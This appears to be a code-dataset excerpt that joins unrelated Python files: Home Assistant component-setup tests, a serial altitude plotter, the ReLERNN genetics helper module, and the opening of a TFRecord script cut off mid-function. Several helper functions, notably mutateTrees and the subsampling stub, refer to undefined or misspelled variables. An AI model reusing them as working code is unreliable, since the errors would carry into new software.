self.hass.config.components.remove("platform_conf")
def test_component_not_found(self):
"""setup_component should not crash if component doesn't exist."""
assert setup.setup_component(self.hass, "non_existing", {}) is False
def test_component_not_double_initialized(self):
"""Test we do not set up a component twice."""
mock_setup = Mock(return_value=True)
mock_integration(self.hass, MockModule("comp", setup=mock_setup))
assert setup.setup_component(self.hass, "comp", {})
assert mock_setup.called
mock_setup.reset_mock()
assert setup.setup_component(self.hass, "comp", {})
assert not mock_setup.called
@patch("homeassistant.util.package.install_package", return_value=False)
def test_component_not_installed_if_requirement_fails(self, mock_install):
"""Component setup should fail if requirement can't install."""
self.hass.config.skip_pip = False
mock_integration(self.hass, MockModule("comp", requirements=["package==0.0.1"]))
assert not setup.setup_component(self.hass, "comp", {})
assert "comp" not in self.hass.config.components
def test_component_not_setup_twice_if_loaded_during_other_setup(self):
"""Test component setup while waiting for lock is not set up twice."""
result = []
async def async_setup(hass, config):
"""Tracking Setup."""
result.append(1)
mock_integration(self.hass, MockModule("comp", async_setup=async_setup))
def setup_component():
"""Set up the component."""
setup.setup_component(self.hass, "comp", {})
thread = threading.Thread(target=setup_component)
thread.start()
setup.setup_component(self.hass, "comp", {})
thread.join()
assert len(result) == 1
def test_component_not_setup_missing_dependencies(self):
"""Test we do not set up a component if not all dependencies loaded."""
deps = ["maybe_existing"]
mock_integration(self.hass, MockModule("comp", dependencies=deps))
assert not setup.setup_component(self.hass, "comp", {})
assert "comp" not in self.hass.config.components
self.hass.data.pop(setup.DATA_SETUP)
mock_integration(self.hass, MockModule("comp2", dependencies=deps))
mock_integration(self.hass, MockModule("maybe_existing"))
assert setup.setup_component(self.hass, "comp2", {})
def test_component_failing_setup(self):
"""Test component that fails setup."""
mock_integration(
self.hass, MockModule("comp", setup=lambda hass, config: False)
)
assert not setup.setup_component(self.hass, "comp", {})
assert "comp" not in self.hass.config.components
def test_component_exception_setup(self):
"""Test component that raises exception during setup."""
def exception_setup(hass, config):
"""Raise exception."""
raise Exception("fail!")
mock_integration(self.hass, MockModule("comp", setup=exception_setup))
assert not setup.setup_component(self.hass, "comp", {})
assert "comp" not in self.hass.config.components
def test_component_setup_with_validation_and_dependency(self):
"""Test all config is passed to dependencies."""
def config_check_setup(hass, config):
"""Test that config is passed in."""
if config.get("comp_a", {}).get("valid", False):
return True
raise Exception(f"Config not passed in: {config}")
platform = MockPlatform()
mock_integration(self.hass, MockModule("comp_a", setup=config_check_setup))
mock_integration(
self.hass,
MockModule("platform_a", setup=config_check_setup, dependencies=["comp_a"]),
)
mock_entity_platform(self.hass, "switch.platform_a", platform)
setup.setup_component(
self.hass,
"switch",
{"comp_a": {"valid": True}, "switch": {"platform": "platform_a"}},
)
self.hass.block_till_done()
assert "comp_a" in self.hass.config.components
def test_platform_specific_config_validation(self):
"""Test platform that specifies config."""
platform_schema = PLATFORM_SCHEMA.extend(
{"valid": True}, extra=vol.PREVENT_EXTRA
)
mock_setup = Mock(spec_set=True)
mock_entity_platform(
self.hass,
"switch.platform_a",
MockPlatform(platform_schema=platform_schema, setup_platform=mock_setup),
)
with assert_setup_component(0, "switch"):
assert setup.setup_component(
self.hass,
"switch",
{"switch": {"platform": "platform_a", "invalid": True}},
)
self.hass.block_till_done()
assert mock_setup.call_count == 0
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove("switch")
with assert_setup_component(0):
assert setup.setup_component(
self.hass,
"switch",
{
"switch": {
"platform": "platform_a",
"valid": True,
"invalid_extra": True,
}
},
)
self.hass.block_till_done()
assert mock_setup.call_count == 0
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove("switch")
with assert_setup_component(1, "switch"):
assert setup.setup_component(
self.hass,
"switch",
{"switch": {"platform": "platform_a", "valid": True}},
)
self.hass.block_till_done()
assert mock_setup.call_count == 1
def test_disable_component_if_invalid_return(self):
"""Test disabling component if invalid return."""
mock_integration(
self.hass, MockModule("disabled_component", setup=lambda hass, config: None)
)
assert not setup.setup_component(self.hass, "disabled_component", {})
assert "disabled_component" not in self.hass.config.components
self.hass.data.pop(setup.DATA_SETUP)
mock_integration(
self.hass,
MockModule("disabled_component", setup=lambda hass, config: False),
)
assert not setup.setup_component(self.hass, "disabled_component", {})
assert "disabled_component" not in self.hass.config.components
self.hass.data.pop(setup.DATA_SETUP)
mock_integration(
self.hass, MockModule("disabled_component", setup=lambda hass, config: True)
)
assert setup.setup_component(self.hass, "disabled_component", {})
assert "disabled_component" in self.hass.config.components
def test_all_work_done_before_start(self):
"""Test all init work done till start."""
call_order = []
async def component1_setup(hass, config):
"""Set up mock component."""
await discovery.async_discover(
hass, "test_component2", {}, "test_component2", {}
)
await discovery.async_discover(
hass, "test_component3", {}, "test_component3", {}
)
return True
def component_track_setup(hass, config):
"""Set up mock component."""
call_order.append(1)
return True
mock_integration(
self.hass, MockModule("test_component1", async_setup=component1_setup)
)
mock_integration(
self.hass, MockModule("test_component2", setup=component_track_setup)
)
mock_integration(
self.hass, MockModule("test_component3", setup=component_track_setup)
)
@callback
def track_start(event):
"""Track start event."""
call_order.append(2)
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_START, track_start)
self.hass.add_job(setup.async_setup_component(self.hass, "test_component1", {}))
self.hass.block_till_done()
self.hass.start()
assert call_order == [1, 1, 2]
async def test_component_warn_slow_setup(hass):
"""Warn we log when a component setup takes a long time."""
mock_integration(hass, MockModule("test_component1"))
with patch.object(hass.loop, "call_later") as mock_call:
result = await setup.async_setup_component(hass, "test_component1", {})
assert result
assert mock_call.called
assert len(mock_call.mock_calls) == 3
timeout, logger_method = mock_call.mock_calls[0][1][:2]
assert timeout == setup.SLOW_SETUP_WARNING
assert logger_method == setup._LOGGER.warning
assert mock_call().cancel.called
async def test_platform_no_warn_slow(hass):
"""Do not warn for long entity setup time."""
mock_integration(
hass, MockModule("test_component1", platform_schema=PLATFORM_SCHEMA)
)
with patch.object(hass.loop, "call_later") as mock_call:
result = await setup.async_setup_component(hass, "test_component1", {})
assert result
assert len(mock_call.mock_calls) == 0
async def test_platform_error_slow_setup(hass, caplog):
"""Don't block startup more than SLOW_SETUP_MAX_WAIT."""
with patch.object(setup, "SLOW_SETUP_MAX_WAIT", 1):
called = []
async def async_setup(*args):
"""Tracking Setup."""
called.append(1)
await asyncio.sleep(2)
mock_integration(hass, MockModule("test_component1", async_setup=async_setup))
result = await setup.async_setup_component(hass, "test_component1", {})
assert len(called) == 1
assert not result
assert "test_component1 is taking longer than 1 seconds" in caplog.text
async def test_when_setup_already_loaded(hass):
"""Test when setup."""
calls = []
async def mock_callback(hass, component):
"""Mock callback."""
calls.append(component)
setup.async_when_setup(hass, "test", mock_callback)
await hass.async_block_till_done()
assert calls == []
hass.config.components.add("test")
hass.bus.async_fire(EVENT_COMPONENT_LOADED, {"component": "test"})
await hass.async_block_till_done()
assert calls == ["test"]
# Event listener should be gone
hass.bus.async_fire(EVENT_COMPONENT_LOADED, {"component": "test"})
await hass.async_block_till_done()
assert calls == ["test"]
# Should be called right away
setup.async_when_setup(hass, "test", mock_callback)
await hass.async_block_till_done()
assert calls == ["test", "test"]
async def test_setup_import_blows_up(hass):
"""Test that we handle it correctly when importing integration blows up."""
with patch(
"homeassistant.loader.Integration.get_component", side_effect=ValueError
):
assert not await setup.async_setup_component(hass, "sun", {})
async def test_parallel_entry_setup(hass):
"""Test config entries are set up in parallel."""
MockConfigEntry(domain="comp", data={"value": 1}).add_to_hass(hass)
MockConfigEntry(domain="comp", data={"value": 2}).add_to_hass(hass)
calls = []
async def mock_async_setup_entry(hass, entry):
"""Mock setting up an entry."""
calls.append(entry.data["value"])
await asyncio.sleep(0)
calls.append(entry.data["value"])
return True
mock_integration(
hass,
MockModule(
"comp",
async_setup_entry=mock_async_setup_entry,
),
)
mock_entity_platform(hass, "config_flow.comp", None)
await setup.async_setup_component(hass, "comp", {})
assert calls == [1, 2, 1, 2]
async def test_integration_disabled(hass, caplog):
"""Test we can disable an integration."""
disabled_reason = "Dependency contains code that breaks Home Assistant"
mock_integration(
hass,
MockModule("test_component1", partial_manifest={"disabled": disabled_reason}),
)
result = await setup.async_setup_component(hass, "test_component1", {})
assert not result
assert disabled_reason in caplog.text
async def test_async_get_loaded_integrations(hass):
"""Test we can enumerate loaded integations."""
hass.config.components.add("notbase")
hass.config.components.add("switch")
hass.config.components.add("notbase.switch")
hass.config.components.add("myintegration")
hass.config.components.add("device_tracker")
hass.config.components.add("device_tracker.other")
hass.config.components.add("myintegration.light")
assert setup.async_get_loaded_integrations(hass) == {
"other",
"switch",
"notbase",
"myintegration",
"device_tracker",
}
|
altitude_plot.py | #!/usr/bin/env python3
'''
Dependencies: numpy, matplotlib, https://github.com/simondlevy/RealtimePlotter
Copyright (C) 2021 Simon D. Levy
MIT License
'''
import serial
from realtime_plot import RealtimePlotter
import numpy as np
from threading import Thread
from sys import argv, stdout
# Change these to suit your needs
PORT = '/dev/ttyACM0'
BAUD = 115200
NTICKS = 10
class SerialPlotter(RealtimePlotter):
def __init__(self):
ranges = [(-1,5), (-5,+5), (-5,+5)]
RealtimePlotter.__init__(self,
ranges,
show_yvals=True,
ylabels=['Altitude', 'Variometer', 'FirstDiff'],
window_name='Altitude Estimation',
styles=['b', 'r', 'g'])
self.tick = 0
self.vals = None
def getValues(self):
return self.vals
def _update(port, plotter):
while True:
plotter.vals = [float(s) for s in port.readline().decode()[:-1].split()]
plotter.tick += 1
if __name__ == '__main__':
port = argv[1] if len(argv) > 1 else PORT
try:
port = serial.Serial(port, BAUD)
except serial.SerialException:
print('Unable to open device on port %s' % PORT)
exit(1)
plotter = SerialPlotter()
thread = Thread(target=_update, args = (port, plotter))
thread.daemon = True
thread.start()
plotter.start()
|
helpers.py |
'''
Authors: Jared Galloway, Jeff Adrion
'''
from ReLERNN.imports import *
#-------------------------------------------------------------------------------------------
def assign_task(mpID, task_q, nProcs):
c,i,nth_job=0,0,1
while (i+1)*nProcs <= len(mpID):
i+=1
nP1=nProcs-(len(mpID)%nProcs)
for j in range(nP1):
task_q.put((mpID[c:c+i], nth_job))
nth_job += 1
c=c+i
for j in range(nProcs-nP1):
task_q.put((mpID[c:c+i+1], nth_job))
nth_job += 1
c=c+i+1
#-------------------------------------------------------------------------------------------
def create_procs(nProcs, task_q, result_q, params, worker):
pids = []
for _ in range(nProcs):
p = mp.Process(target=worker, args=(task_q, result_q, params))
p.daemon = True
p.start()
pids.append(p)
return pids
#-------------------------------------------------------------------------------------------
def get_corrected_index(L,N):
idx,outN="",""
dist=float("inf")
for i in range(len(L)):
D=abs(N-L[i])
if D < dist:
idx=i
outN=L[i]
dist=D
return [idx,outN]
#-------------------------------------------------------------------------------------------
def get_corrected(rate,bs):
idx=get_corrected_index(bs["Q2"],rate)
CI95LO=bs["CI95LO"][idx[0]]
CI95HI=bs["CI95HI"][idx[0]]
cRATE=relu(rate+(bs["rho"][idx[0]]-idx[1]))
ciHI=relu(cRATE+(CI95HI-idx[1]))
ciLO=relu(cRATE+(CI95LO-idx[1]))
return [cRATE,ciLO,ciHI]
#-------------------------------------------------------------------------------------------
def get_index(pos, winSize):
y=snps_per_win(pos,winSize)
st=0
indices=[]
for i in range(len(y)):
indices.append([st,st+y[i]])
st+=y[i]
return indices
#-------------------------------------------------------------------------------------------
def snps_per_win(pos, window_size):
bins = np.arange(1, pos.max()+window_size, window_size) #use 1-based coordinates, per VCF standard
y,x = np.histogram(pos,bins=bins)
return y
#-------------------------------------------------------------------------------------------
def find_win_size(winSize, pos, winSizeMx):
snpsWin=snps_per_win(pos,winSize)
mn,u,mx = snpsWin.min(), int(snpsWin.mean()), snpsWin.max()
if mx > winSizeMx:
return [-1]
elif mx < winSizeMx:
return [1]
else:
return [winSize,mn,u,mx,len(snpsWin)]
#-------------------------------------------------------------------------------------------
def force_win_size(winSize, pos):
snpsWin=snps_per_win(pos,winSize)
mn,u,mx = snpsWin.min(), int(snpsWin.mean()), snpsWin.max()
return [winSize,mn,u,mx,len(snpsWin)]
#-------------------------------------------------------------------------------------------
def maskStats(wins, last_win, mask, maxLen):
"""
return a three-element list with the first element being the total proportion of the window that is masked,
the second element being a list of masked positions that are relative to the windown start=0 and the window end = window length,
and the third being the last window before breaking to expidite the next loop
"""
chrom = wins[0].split(":")[0]
a = wins[1]
L = wins[2]
b = a + L
prop = [0.0,[],0]
try:
for i in range(last_win, len(mask[chrom])):
x, y = mask[chrom][i][0], mask[chrom][i][1]
if y < a:
continue
if b < x:
return prop
else: # i.e. [a--b] and [x--y] overlap
if a >= x and b <= y:
return [1.0, [[0,maxLen]], i]
elif a >= x and b > y:
win_prop = (y-a)/float(b-a)
prop[0] += win_prop
prop[1].append([0,int(win_prop * maxLen)])
prop[2] = i
elif b <= y and a < x:
win_prop = (b-x)/float(b-a)
prop[0] += win_prop
prop[1].append([int((1-win_prop)*maxLen),maxLen])
prop[2] = i
else:
win_prop = (y-x)/float(b-a)
prop[0] += win_prop
prop[1].append([int(((x-a)/float(b-a))*maxLen), int(((y-a)/float(b-a))*maxLen)])
prop[2] = i
return prop
except KeyError:
return prop
#-------------------------------------------------------------------------------------------
def check_demHist(path):
fTypeFlag = -9
with open(path, "r") as fIN:
for line in fIN:
if line.startswith("mutation_per_site"):
fTypeFlag = 1
break
if line.startswith("label"):
fTypeFlag = 2
break
if line.startswith("time_index"):
fTypeFlag = 3
break
return fTypeFlag
#-------------------------------------------------------------------------------------------
def convert_msmc_output(results_file, mutation_rate, generation_time):
"""
This function converts the output from msmc into a csv the will be read in for
plotting comparison.
MSMC outputs times and rates scaled by the mutation rate per basepair per generation.
First, scaled times are given in units of the per-generation mutation rate.
This means that in order to convert scaled times to generations,
divide them by the mutation rate. In humans, we used mu=1e-8 per basepair per generation.
To convert generations into years, multiply by the generation time, for which we used 10 years.
To get population sizes out of coalescence rates, first take the inverse of the coalescence rate,
scaledPopSize = 1 / lambda00. Then divide this scaled population size by 2*mu
"""
outfile = results_file+".csv"
out_fp = open(outfile, "w")
in_fp = open(results_file, "r")
header = in_fp.readline()
out_fp.write("label,x,y\n")
for line in in_fp:
result = line.split()
time = float(result[1])
time_generation = time / mutation_rate
time_years = time_generation * generation_time
lambda00 = float(result[3])
scaled_pop_size = 1 / lambda00
size = scaled_pop_size / (2*mutation_rate)
out_fp.write(f"pop0,{time_years},{size}\n")
out_fp.close
return None
#-------------------------------------------------------------------------------------------
def convert_demHist(path, nSamps, gen, fType, mu):
swp, PC, DE = [],[],[]
# Convert stairwayplot to msp demographic_events
if fType == 1:
with open(path, "r") as fIN:
flag=0
lCt=0
for line in fIN:
if flag == 1:
if lCt % 2 == 0:
swp.append(line.split())
lCt+=1
if line.startswith("mutation_per_site"):
flag=1
N0 = int(float(swp[0][6]))
for i in range(len(swp)):
if i == 0:
PC.append(msp.PopulationConfiguration(sample_size=nSamps, initial_size=N0))
else:
DE.append(msp.PopulationParametersChange(time=int(float(swp[i][5])/float(gen)), initial_size=int(float(swp[i][6])), population=0))
## Convert MSMC to similar format to smc++
if fType == 3:
convert_msmc_output(path, mu, gen)
path+=".csv"
## Convert smc++ or MSMC results to msp demographic_events
if fType == 2 or fType == 3:
with open(path, "r") as fIN:
fIN.readline()
for line in fIN:
ar=line.split(",")
swp.append([int(float(ar[1])/gen),int(float(ar[2]))])
N0 = swp[0][1]
for i in range(len(swp)):
if i == 0:
PC.append(msp.PopulationConfiguration(sample_size=nSamps, initial_size=N0))
else:
DE.append(msp.PopulationParametersChange(time=swp[i][0], initial_size=swp[i][1], population=0))
dd=msp.DemographyDebugger(population_configurations=PC,
demographic_events=DE)
print("Simulating under the following population size history:")
dd.print_history()
MspD = {"population_configurations" : PC,
"migration_matrix" : None,
"demographic_events" : DE}
if MspD:
return MspD
else:
print("Error in converting demographic history file.")
sys.exit(1)
#-------------------------------------------------------------------------------------------
def relu(x):
return max(0,x)
#-------------------------------------------------------------------------------------------
def zscoreTargets(self):
norm = self.targetNormalization
nTargets = copy.deepcopy(self.infoDir['y'])
if(norm == 'zscore'):
tar_mean = np.mean(nTargets,axis=0)
tar_sd = np.std(nTargets,axis=0)
nTargets -= tar_mean
nTargets = np.divide(nTargets,tar_sd,out=np.zeros_like(nTargets),where=tar_sd!=0)
#-------------------------------------------------------------------------------------------
def load_and_predictVCF(VCFGenerator,
resultsFile=None,
network=None,
chromStr=None,
minS = 50,
numWins = None,
batchSize = None,
gpuID = 0,
hotspots = False):
if hotspots:
print("Error: hotspot detection under construction")
sys.exit(1)
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpuID)
## The following code block appears necessary for running with tf2 and cudnn
from tensorflow.compat.v1 import ConfigProto
from tensorflow.compat.v1 import Session
config = ConfigProto()
config.gpu_options.allow_growth = True
Session(config=config)
###
# load json and create model
if(network != None):
jsonFILE = open(network[0],"r")
loadedModel = jsonFILE.read()
jsonFILE.close()
model=model_from_json(loadedModel)
model.load_weights(network[1])
else:
print("Error: no pretrained network found!")
sys.exit(1)
num_batches = int(np.ceil(numWins / batchSize))
with open(resultsFile, "w") as fOUT:
ct=0
last = int(chromStr.split(":")[-1].split("-")[-1])
fOUT.write("\t".join([str(head) for head in ["chrom","start","end","nSites","recombRate"]])+"\n")
for i in range(num_batches):
X,chrom,win,info,nSNPs = VCFGenerator.__getitem__(i)
predictions = model.predict(X)
u=np.mean(info["rho"])
sd=np.std(info["rho"])
for j in range(len(predictions)):
if nSNPs[j] >= minS:
fOUT.write("%s\t%s\t%s\t%s\t%s\n" %(chrom,ct,min(ct+win,last),nSNPs[j],relu(sd*predictions[j][0]+u)))
ct+=win
return None
#-------------------------------------------------------------------------------------------
def runModels(ModelFuncPointer,
ModelName,
TrainDir,
TrainGenerator,
ValidationGenerator,
TestGenerator,
resultsFile=None,
numEpochs=10,
epochSteps=100,
validationSteps=1,
network=None,
nCPU = 1,
gpuID = 0):
os.environ["CUDA_VISIBLE_DEVICES"]=str(gpuID)
## The following code block appears necessary for running with tf2 and cudnn
from tensorflow.compat.v1 import ConfigProto
from tensorflow.compat.v1 import Session
config = ConfigProto()
config.gpu_options.allow_growth = True
Session(config=config)
###
if(resultsFile == None):
resultsFilename = os.path.basename(trainFile)[:-4] + ".p"
resultsFile = os.path.join("./results/",resultsFilename)
x,y = TrainGenerator.__getitem__(0)
model = ModelFuncPointer(x,y)
# Early stopping and saving the best weights
callbacks_list = [
EarlyStopping(
monitor='val_loss',
verbose=1,
min_delta=0.01,
patience=100),
ModelCheckpoint(
filepath=network[1],
monitor='val_loss',
save_best_only=True),
TerminateOnNaN()
]
if nCPU > 1:
history = model.fit(TrainGenerator,
steps_per_epoch=epochSteps,
epochs=numEpochs,
validation_data=ValidationGenerator,
callbacks=callbacks_list,
use_multiprocessing=True,
max_queue_size=nCPU,
workers=nCPU)
else:
history = model.fit(TrainGenerator,
steps_per_epoch=epochSteps,
epochs=numEpochs,
validation_data=ValidationGenerator,
callbacks=callbacks_list,
use_multiprocessing=False)
# Write the network
if(network != None):
##serialize model to JSON
model_json = model.to_json()
with open(network[0], "w") as json_file:
json_file.write(model_json)
# Load json and create model
if(network != None):
jsonFILE = open(network[0],"r")
loadedModel = jsonFILE.read()
jsonFILE.close()
model=model_from_json(loadedModel)
model.load_weights(network[1])
else:
print("Error: model and weights not loaded")
sys.exit(1)
x,y = TestGenerator.__getitem__(0)
predictions = model.predict(x)
history.history['loss'] = np.array(history.history['loss'])
history.history['val_loss'] = np.array(history.history['val_loss'])
history.history['predictions'] = np.array(predictions)
history.history['Y_test'] = np.array(y)
history.history['name'] = ModelName
print("results written to: ",resultsFile)
pickle.dump(history.history, open( resultsFile, "wb" ))
return None
#-------------------------------------------------------------------------------------------
#def indicesGenerator(batchSize,numReps):
# '''
# Generate indices randomly from range (0,numReps) in batches of size batchSize
# without replacement.
#
# This is for the batch generator to randomly choose trees from a directory
# but make sure
# '''
# availableIndices = np.arange(numReps)
# np.random.shuffle(availableIndices)
# ci = 0
# while 1:
# if((ci+batchSize) > numReps):
# ci = 0
# np.random.shuffle(availableIndices)
# batchIndices = availableIndices[ci:ci+batchSize]
# ci = ci+batchSize
#
# yield batchIndices
#-------------------------------------------------------------------------------------------
def getHapsPosLabels(direc,simulator,shuffle=False):
'''
loops through a trees directory created by the data generator class
and returns the repsective genotype matrices, positions, and labels
'''
haps = []
positions = []
infoFilename = os.path.join(direc,"info.p")
infoDict = pickle.load(open(infoFilename,"rb"))
labels = infoDict["y"]
#how many trees files are in this directory.
li = os.listdir(direc)
numReps = len(li) - 1 #minus one for the 'info.p' file
for i in range(numReps):
filename = str(i) + ".trees"
filepath = os.path.join(direc,filename)
treeSequence = msp.load(filepath)
haps.append(treeSequence.genotype_matrix())
positions.append(np.array([s.position for s in treeSequence.sites()]))
haps = np.array(haps)
positions = np.array(positions)
return haps,positions,labels
#-------------------------------------------------------------------------------------------
def simplifyTreeSequenceOnSubSampleSet_stub(ts,numSamples):
'''
This function should take in a tree sequence, generate
a subset the size of numSamples, and return the tree sequence simplified on
that subset of individuals
'''
ts = ts.simplify() #is this neccessary
inds = [ind.id for ind in ts.individuals()]
sample_subset = np.sort(np.random.choice(inds,sample_size,replace=False))
sample_nodes = []
for i in sample_subset:
ind = ts.individual(i)
sample_nodes.append(ind.nodes[0])
sample_nodes.append(ind.nodes[1])
ts = ts.simplify(sample_nodes)
return ts
#-------------------------------------------------------------------------------------------
def sort_min_diff(amat):
'''this function takes in a SNP matrix with indv on rows and returns the same matrix with indvs sorted by genetic similarity.
this problem is NP, so here we use a nearest neighbors approx. it's not perfect, but it's fast and generally performs ok.
assumes your input matrix is a numpy array'''
mb = NearestNeighbors(len(amat), metric='manhattan').fit(amat)
v = mb.kneighbors(amat)
smallest = np.argmin(v[0].sum(axis=1))
return amat[v[1][smallest]]
#-------------------------------------------------------------------------------------------
def mutateTrees(treesDirec,outputDirec,muLow,muHigh,numMutsPerTree=1,simulator="msprime"):
'''
read in .trees files from treesDirec, mutate that tree numMuts seperate times
using a mutation rate pulled from a uniform dirstribution between muLow and muHigh
also, re-write the labels file to reflect.
'''
if(numMutsPerTree > 1):
assert(treesDirec != outputDirec)
if not os.path.exists(outputDirec):
print("directory '",outputDirec,"' does not exist, creating it")
os.makedirs(outputDirec)
infoFilename = os.path.join(treesDirec,"info.p")
infoDict = pickle.load(open(infoFilename,"rb"))
labels = infoDict["y"]
newLabels = []
newMaxSegSites = 0
#how many trees files are in this directory.
li = os.listdir(treesDirec)
numReps = len(li) - 1 #minus one for the 'labels.txt' file
for i in range(numReps):
filename = str(i) + ".trees"
filepath = os.path.join(treesDirec,filename)
treeSequence = msp.load(filepath)
blankTreeSequence = msp.mutate(treeSequence,0)
rho = labels[i]
for mut in range(numMuts):
simNum = (i*numMuts) + mut
simFileName = os.path.join(outputDirec,str(simNum)+".trees")
mutationRate = np.random.uniform(muLow,muHigh)
mutatedTreeSequence = msp.mutate(blankTreeSequence,mutationRate)
mutatedTreeSequence.dump(simFileName)
newMaxSegSites = max(newMaxSegSites,mutatedTreeSequence.num_sites)
newLabels.append(rho)
infoCopy = copy.deepcopy(infoDict)
infoCopy["maxSegSites"] = newMaxSeqSites
if(numMutsPerTree > 1):
infoCopy["y"] = np.array(newLabels,dtype="float32")
infoCopy["numReps"] = numReps * numMuts
outInfoFilename = os.path.join(outputDirec,"info.p")
pickle.dump(infocopy,open(outInfoFilename,"wb"))
return None
#-------------------------------------------------------------------------------------------
def segSitesStats(treesDirec):
'''
DEPRICATED
'''
infoFilename = os.path.join(treesDirec,"info.p")
infoDict = pickle.load(open(infoFilename,"rb"))
newLabels = []
newMaxSegSites = 0
#how many trees files are in this directory.
li = os.listdir(treesDirec)
numReps = len(li) - 1 #minus one for the 'labels.txt' file
segSites = []
for i in range(numReps):
filename = str(i) + ".trees"
filepath = os.path.join(treesDirec,filename)
treeSequence = msp.load(filepath)
segSites.append(treeSequence.num_sites)
return segSites
#-------------------------------------------------------------------------------------------
def mae(x,y):
'''
Compute mean absolute error between predictions and targets
float[],float[] -> float
'''
assert(len(x) == len(y))
summ = 0.0
length = len(x)
for i in range(length):
summ += abs(x[i] - y[i])
return summ/length
#-------------------------------------------------------------------------------------------
def mse(x,y):
'''
Compute mean squared error between predictions and targets
float[],float[] -> float
'''
assert(len(x) == len(y))
summ = 0.0
length = len(x)
for i in range(length):
summ += (x[i] - y[i])**2
return summ/length
#-------------------------------------------------------------------------------------------
def plotResults(resultsFile,saveas):
'''
plotting code for testing a model on simulation.
using the resulting pickle file on a training run (resultsFile).
This function plots the results of the final test set predictions,
as well as validation loss as a function of Epochs during training.
'''
plt.rc('font', family='serif', serif='Times')
plt.rc('xtick', labelsize=6)
plt.rc('ytick', labelsize=6)
plt.rc('axes', labelsize=6)
results = pickle.load(open( resultsFile , "rb" ))
fig,axes = plt.subplots(2,1)
plt.subplots_adjust(hspace=0.5)
predictions = np.array([float(Y) for Y in results["predictions"]])
realValues = np.array([float(X) for X in results["Y_test"]])
r_2 = round((np.corrcoef(predictions,realValues)[0,1])**2,5)
mae_0 = round(mae(realValues,predictions),4)
mse_0 = round(mse(realValues,predictions),4)
labels = "$R^{2} = $"+str(r_2)+"\n"+"$mae = $" + str(mae_0)+" | "+"$mse = $" + str(mse_0)
axes[0].scatter(realValues,predictions,marker = "o", color = 'tab:purple',s=5.0,alpha=0.6)
lims = [
np.min([axes[0].get_xlim(), axes[0].get_ylim()]), # min of both axes
np.max([axes[0].get_xlim(), axes[0].get_ylim()]), # max of both axes
]
axes[0].set_xlim(lims)
axes[0].set_ylim(lims)
axes[0].plot(lims, lims, 'k-', alpha=0.75, zorder=0)
axes[0].set_title(results["name"]+"\n"+labels,fontsize=6)
lossRowIndex = 1
axes[1].plot(results["loss"],label = "mae loss",color='tab:cyan')
axes[1].plot(results["val_loss"], label= "mae validation loss",color='tab:pink')
#axes[1].plot(results["mean_squared_error"],label = "mse loss",color='tab:green')
#axes[1].plot(results["val_mean_squared_error"], label= "mse validation loss",color='tab:olive')
axes[1].legend(frameon = False,fontsize = 6)
axes[1].set_ylabel("mse")
axes[0].set_ylabel(str(len(predictions))+" msprime predictions")
axes[0].set_xlabel(str(len(realValues))+" msprime real values")
fig.subplots_adjust(left=.15, bottom=.16, right=.85, top=.92,hspace = 0.5,wspace=0.4)
height = 7.00
width = 7.00
axes[0].grid()
fig.set_size_inches(height, width)
fig.savefig(saveas)
#-------------------------------------------------------------------------------------------
def getMeanSDMax(trainDir):
'''
get the mean and standard deviation of rho from training set
str -> int,int,int
'''
info = pickle.load(open(trainDir+"/info.p","rb"))
rho = info["rho"]
segSites = info["segSites"]
tar_mean = np.mean(rho,axis=0)
tar_sd = np.std(rho,axis=0)
return tar_mean,tar_sd,max(segSites)
#-------------------------------------------------------------------------------------------
def unNormalize(mean,sd,data):
'''
un-zcore-ify. do the inverse to get real value predictions
float,float,float[] -> float[]
'''
data *= sd
data += mean ##comment this line out for GRU_TUNED84_RELU
return data
#-------------------------------------------------------------------------------------------
def plotParametricBootstrap(results,saveas):
'''
Use the location of "out" paramerter to parametric bootstrap
as input to plot the results of said para-boot
'''
stats = pickle.load(open(results,'rb'))
x = stats["rho"]
fig, ax = plt.subplots()
for i,s in enumerate(stats):
if(i == 0):
continue
ax.plot(x,stats[s])
lims = [
np.min([ax.get_xlim(), ax.get_ylim()]), # min of both axes
np.max([ax.get_xlim(), ax.get_ylim()]), # max of both axes
]
ax.set_xlim(lims)
ax.set_ylim(lims)
ax.plot(lims, lims, 'k-', alpha=0.75, zorder=0)
fig.savefig(saveas)
return None
|
create_tfrecords.py | """
Create the tfrecord files for a dataset.
This script is taken from the Visipedia repo: https://github.com/visipedia/tfrecords
A lot of this code comes from the tensorflow inception example, so here is their license:
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
import argparse
from datetime import datetime
import hashlib
import json
import os
from queue import Queue
import random
import sys
import threading
import numpy as np
import tensorflow as tf
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
def _validate_text(text):
"""If text is not str or unicode, then try to convert it to str."""
if isinstance(text, str):
return text.encode()
else:
return str(text).encode()
def _str_and_encode(value):
return str(value).encode()
def _convert_to_example(image_example, image_buffer, height, width,
colorspace='RGB', channels=3, image_format='JPEG'):
"""Build an Example proto for an example.
Args:
image_example: dict, an image example
image_buffer: string, JPEG encoding of RGB image
height: integer, image height in pixels
width: integer, image width in pixels
colorspace: TODO
channels: TODO
image_format: TODO
Returns:
Example proto
"""
# Required
filename = str(image_example['filename']).encode() # default encoding='utf-8'
image_id = str(image_example['id']).encode()
# Class label for the whole image
image_class = image_example.get('class', {})
class_label = image_class.get('label', 0)
class_text = _validate_text(image_class.get('text', ''))
class_conf = image_class.get('conf', 1.)
# Objects
image_objects = image_example.get('object', {})
object_count = image_objects.get('count', 0)
# Bounding Boxes
image_bboxes = image_objects.get('bbox', {})
xmin = image_bboxes.get('xmin', [])
xmax = image_bboxes.get('xmax', [])
ymin = image_bboxes.get('ymin', [])
